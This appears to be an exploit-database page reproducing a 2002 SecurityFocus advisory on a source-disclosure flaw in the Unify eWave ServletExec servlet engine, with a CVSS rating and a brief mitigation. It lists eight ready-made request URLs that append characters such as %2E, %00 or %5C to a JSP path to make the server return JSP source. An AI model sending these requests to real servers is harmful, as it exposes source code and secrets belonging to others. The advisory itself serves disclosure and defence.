header-logo
Suggest Exploit
vendor:
eWave ServletExec
by:
SecurityFocus
7.5
CVSS
HIGH
Source Disclosure
200
CWE
Product Name: eWave ServletExec
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Unify eWave ServletExec Source Disclosure Vulnerability

Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. ServletExec will return the source code of JSP files when a HTTP request is appended with one of the following characters: ., %2E, +, %2B, %5C, %20, %00. Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.

Mitigation:

Ensure that the web server is configured to deny requests for JSP source code.
Source

Exploit-DB raw data:

source : https://www.securityfocus.com/bid/1970/info

Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. 

ServletExec will return the source code of JSP files when a HTTP request is appended with one of the following characters:

.
%2E
+
%2B
%5C
%20
%00

For example, the following URL will yield the source of the specified JSP file:

http://target/directory/jsp/file.jsp.

Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.

Any of the following URL requests will yield the source of the specified JSP file:

http://target/directory/jsp/file.jsp. 
http://target/directory/jsp/file.jsp%2E
http://target/directory/jsp/file.jsp+ 
http://target/directory/jsp/file.jsp%2B
http://target/directory/jsp/file.jsp\ 
http://target/directory/jsp/file.jsp%5C
http://target/directory/jsp/file.jsp%20 
http://target/directory/jsp/file.jsp%00